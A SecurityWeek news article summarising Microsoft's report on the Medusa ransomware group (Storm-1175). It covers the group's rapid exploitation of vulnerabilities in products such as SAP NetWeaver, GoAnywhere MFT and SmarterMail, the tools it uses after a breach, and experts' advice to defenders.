Medusa Ransomware Fast to Exploit Vulnerabilities, Breached Systems

The Medusa ransomware group has been operating at a fast pace, seizing short windows of opportunity in attacks across multiple verticals, Microsoft says. Operating as a ransomware-as-a-service (RaaS), Medusa has been active since June 2021 and hit over 300 organizations in the critical infrastructure sector by February 2025. The group is known for engaging in double extortion, stealing victims’ data in addition to encrypting it, as well as for relying on phishing and the exploitation of unpatched vulnerabilities for initial access. In recent attacks, Medusa’s operators, tracked by Microsoft as Storm-1175, were seen moving rapidly from initial access to post-compromise operations, often within days or, in some cases, hours. Additionally, the group was seen quickly weaponizing newly disclosed vulnerabilities, as well as exploiting zero-day bugs in web-facing systems. “The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the United Kingdom, and the United States,” Microsoft says. Over the past three years, Medusa’s operators have exploited at least 16 vulnerabilities in Microsoft Exchange, Papercut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, SAP NetWeaver, CrushFTP, GoAnywhere MFT, SmarterMail, and BeyondTrust. Storm-1175, Microsoft says, weaponizes newly disclosed vulnerabilities immediately. It was seen exploiting the NetWeaver bug one day after it was publicly disclosed on April 24, 2025. The group was also seen chaining multiple security defects to obtain remote code execution (RCE) on the victims’ systems. It has also targeted Linux systems, including Oracle WebLogic instances. According to Microsoft, the group has exploited at least three zero-day flaws, including CVE-2026-23760 (SmarterMail) and CVE-2025-10035 (GoAnywhere MFT). In some cases, Storm-1175 exploited the flaws seven days before public disclosure. Following initial access, the gang typically deploys a web shell or remote access payload and proceeds to data exfiltration and the execution of file-encrypting ransomware within one day. During this window, Storm-1175 establishes persistence, performs reconnaissance and lateral movement, modifies firewall settings to enable remote access, and exfiltrates credentials. “We have also observed that after gaining administrator credentials, Storm-1175 has used a script to recover passwords from Veeam backup software, which is used to connect to remote hosts, therefore enabling ransomware deployment to additional connected systems,” Microsoft notes. The hackers have been using living-off-the-land binaries such as PowerShell and PsExec, along with Cloudflare tunnels, Remote Desktop Protocol (RDP), various remote monitoring and management (RMM) tools, PDQ Deployer for payload execution, Impacket and Mimikatz for lateral movement and credential harvesting, and Bandizip and Rclone for data collection and exfiltration. In light of Microsoft’s report, Tuskira co-founder and CEO Piyush Sharma and AttackIQ field CISO Pete Luban urge at-risk organizations to continuously inventory and monitor both internal and external systems to identify exploitable assets and reduce risks. “The heightened speed and efficiency of these campaigns is a game-changer for organizations with high-pressure environments like hospitals, insurers, and banks, which is who Storm-1175 is primarily targeting. These organizations already have little tolerance for downtime, complex edge infrastructure, and a constant patching backlog, so a threat actor that can spot exposed assets and exploit them before defenders catch up has a much wider lane than it did even a year ago,” Sharma said. Luban commented, “If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime, it’s the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data.” Related: German Police Unmask REvil Ransomware Leader Related: Stolen Logins Are Fueling Everything From Ransomware to Nation-State Cyberattacks Related: Cisco Firewall Vulnerability Exploited as Zero-Day in Interlock Ransomware Attacks Related: Medusa Ransomware Uses Malicious Driver to Disable Security Tools WRITTEN BY Ionut Arghire Ionut Arghire is an international correspondent for SecurityWeek. More from Ionut Arghire European Commission Confirms Data Breach Linked to Trivy Supply Chain Attack TrueConf Zero-Day Exploited in Asian Government Attacks Critical ShareFile Flaws Lead to Unauthenticated RCE React2Shell Exploited in Large-Scale Credential Harvesting Campaign North Korean Hackers Drain $285 Million From Drift in 10 Seconds Cisco Patches Critical and High-Severity Vulnerabilities 250,000 Affected by Data Breach at Nacogdoches Memorial Hospital Mercor Hit by LiteLLM Supply Chain Attack Latest News GPUBreach: Root Shell Access Achieved via GPU Rowhammer Attack  German Police Unmask REvil Ransomware Leader White House Seeks to Slash CISA Funding by $707 Million Wynn Resorts Says 21,000 Employees Affected by ShinyHunters Hack Google DeepMind Researchers Map Web Attacks Against AI Agents Guardarian Users Targeted With Malicious Strapi NPM Packages North Korean Hackers Target High-Profile Node.js Maintainers Fortinet Rushes Emergency Fixes for Exploited Zero-Day Trending Webinar: Securing Fragile OT In An Exposed World March 10, 2026 Get a candid look at the current OT threat landscape as we move past "doom and gloom" to discuss the mechanics of modern OT exposure. Register Webinar: Why Automated Pentesting Alone Is Not Enough April 7, 2026 Join our live diagnostic session to expose hidden coverage gaps and shift from flawed tool-level evaluations to a comprehensive, program-level validation discipline. Register People on the Move Scott Goree has been appointed Senior Vice President of Channel and Alliances at Delinea. Kai has named Nick Degnan as Chief Revenue Officer. Joe Sullivan has been appointed Strategic Advisor at cloud security firm Upwind. More People On The Move Expert Insights The Next Cybersecurity Crisis Isn’t Breaches—It’s Data You Can’t Trust Data integrity shouldn’t be seen only through the prism of a technical concern but also as a leadership issue. (Steve Durbin) Why Agentic AI Systems Need Better Governance – Lessons From OpenClaw Agentic AI platforms are shifting from passive recommendation tools to autonomous action-takers with real system access, (Etay Maor) The Human IOC: Why Security Professionals Struggle With Social Vetting Applying SOC-level rigor to the rumors, politics, and 'human intel' can make or break a security team. (Joshua Goldfarb) How To 10x Your Vulnerability Management Program In The Agentic Era The evolution of vulnerability management in the agentic era is characterized by continuous telemetry, contextual prioritization and the ultimate goal of agentic remediation. (Nadir Izrael) SIM Swaps Expose A Critical Flaw In Identity Security SIM swap attacks exploit misplaced trust in phone numbers and human processes to bypass authentication controls and seize high-value accounts. (Torsten George) Flipboard Reddit Whatsapp Email